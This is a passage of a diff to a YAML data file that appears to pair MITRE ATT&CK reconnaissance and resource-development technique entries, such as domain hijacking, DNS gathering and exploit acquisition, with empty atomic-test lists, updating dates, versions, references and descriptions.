+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -110798,7 +111469,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -110816,47 +111487,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -110865,21 +111499,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -110919,7 +111589,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -110938,15 +111608,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -110954,19 +111622,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -111000,55 +111668,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -111073,7 +111750,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -111089,8 +111766,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -111112,7 +111787,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -111128,8 +111803,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -111157,7 +111830,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -111173,33 +111846,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -111213,18 +111886,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -111245,7 +111929,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -111261,39 +111945,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -111301,13 +111983,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
